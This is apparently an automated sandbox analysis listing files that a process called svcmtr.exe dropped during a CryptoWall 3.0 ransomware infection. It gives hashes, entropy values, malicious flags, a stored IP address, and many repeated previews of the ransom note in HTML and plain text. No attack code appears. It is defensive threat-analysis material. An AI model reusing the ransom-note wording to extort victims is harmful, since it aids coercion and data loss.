                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25454
                                                                                                                          Entropy (8bit):7.99227459143512
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GFrzczxXSCB4SdMQyhIn6gYRWCxo46KwqPz:areSpSdWhWwPxoVKL
                                                                                                                          MD5:E6ABD7C9E18AFE67432BB48B310EBD63
                                                                                                                          SHA1:EA9B4C3C30FF4E3A65999926B66B522411F9E12A
                                                                                                                          SHA-256:714A564B35C4153EC563919FAF68C3109F6D5E3B256C48E85E780A425B7B10E2
                                                                                                                          SHA-512:F82F71BBCECCECCBCF58593D8233DB95D5CF044CADDB120E94408778BF059F9DA3B366B85D84D18ED6A40F56FEFBEE79E218121F564FC2E8CD52C5F1551C0F79
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):430
                                                                                                                          Entropy (8bit):5.913381561430947
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2TkIdn:c+z5U4a8OoDUX+S2TkIdn
                                                                                                                          MD5:9559B4B0A7E9B54F1E77FDDFF1BA4D3C
                                                                                                                          SHA1:AD0C9C5A7AFB954840386E2600C61087CA1FE854
                                                                                                                          SHA-256:FFC25C9C9000BBC75F3E0551D09FC70DFBE7C10D6EA6832420CD10C8A5D4C198
                                                                                                                          SHA-512:3D18EF1764A5FDD452222ED35DA3830FA9ED2C869AF3AA0193EE39A2B9AA44723F71FC66E69A4961433C6EBC02C5FCCE4A8CAB3A5A4F1EC6130AEB07814254E7
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..#..[R@JLA.....*4....n.......oF}..?.
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6382
                                                                                                                          Entropy (8bit):7.953972400342168
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GovLnUcws4sQ6en3CI1tMbOMGTa6Hp4JlD5y:GIArsQ6en4L6J4JLy
                                                                                                                          MD5:456A66D829191A53BD1BEC55D81A9F13
                                                                                                                          SHA1:65EE4ABE7E0A5C7C1B65E133FE00C3B4880DAAF3
                                                                                                                          SHA-256:DCDA40FA7D4B242D82A4B18DA79B3E1B65536C6E812A3287AA64E56CF258456C
                                                                                                                          SHA-512:C02DFF14077B86EAF9208BC780C70DFF09EA5C7E2489558DC429EF688AED5D48707ECE4CD8F6C2D5AC866F44004AC0EC6DD6F8B83E811177F459BDF330D7B923
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1918
                                                                                                                          Entropy (8bit):7.770366939156214
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgLUDX1N54dE5TWJwiA+P17YuqYq/4jL1uKnLulxetx:cztoDAUDZ5oJV7tq9cLcKLjx
                                                                                                                          MD5:8798046759AB3AF89ED26DD4348AF901
                                                                                                                          SHA1:A2C4073B0DDE315F11F93A9817B728B66665336E
                                                                                                                          SHA-256:F9AEAF521CD1C6C989DECB96ABF12487846683BBE367AD8F4806E090F49D4C14
                                                                                                                          SHA-512:3F2E1FAC9A5088FDD8FD21086CF6A6B66979ED9E1859A0CEB5F3AC36138C68D4B62E87BE4D6FE6A4984C113CA4A7AF36163FA9077F8564E5A97BAADEAFF95DB0
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2766
                                                                                                                          Entropy (8bit):7.874635302470787
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg7S8CJt0IT2CM5Z3VESHCybpgbKnxvRqUDklAeSny9:cztoDr8CgIT21v3VfxpEKeowGy9
                                                                                                                          MD5:0A7832618AA20DB05CDD173B8F944E1C
                                                                                                                          SHA1:61CA681B5BBD91D6CD6CE65C622AA18C5636B9B5
                                                                                                                          SHA-256:154DE12C528D8C0095153DD9FD506BD31624841954E1B2E2D6E3C37892DEE26E
                                                                                                                          SHA-512:831F3FA6E270CFB2D922F8701779D854FDF7C1546CF8582B20896DAB038AA9545AFD4B57A7C6CE94617AC5396F107BBF6DAEFF5FD9E5DE7B37E355970C1CB1F8
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8350
                                                                                                                          Entropy (8bit):7.969185143276263
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoLzQmlB2dQeINLDzs96g1ERZTikOROFkeS8iFqSTaJTTuXjIbc:GOzrJhz3bTikNaeFEqZ/uXj9
                                                                                                                          MD5:923F96EFE00E329A2EF0E95597A2B3FC
                                                                                                                          SHA1:A69F0879508998A4D95E62E90ADED3A20FD7DDD4
                                                                                                                          SHA-256:476B2E30AB4A7459DFDB9E822B2E9B43DA23612E7364AAFFB1F34BC15DE1F10A
                                                                                                                          SHA-512:D7EB551CBDA2A8EBE0F71953BA11F9054A3208B19530602BC8878A6A006181C095ED8647718104F8ACFBB489529FE26176EFA6A7A77504A8DB9A93AD1386EE4C
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12
                                                                                                                          Entropy (8bit):2.8553885422075336
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:fuMEc:23c
                                                                                                                          MD5:99C7886BEA2DE7A0101C2650904125B2
                                                                                                                          SHA1:923B92CB8983479444E728E099B85F84A8DC1358
                                                                                                                          SHA-256:FFF62C3400A9C4F4618583FD90966E4E5B1122239157CAA576BFD6A1FA71204D
                                                                                                                          SHA-512:7FB99EB3F5DF99B330325BB84C3676ABFD4BA02A2F37C596FDBD717FEEEA84887522E4957D57FD2C77A6A73C56656D1B8A8D17BB28CE158CD474ECE6E71B5565
                                                                                                                          Malicious:false
                                                                                                                          Preview:8.46.123.189
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
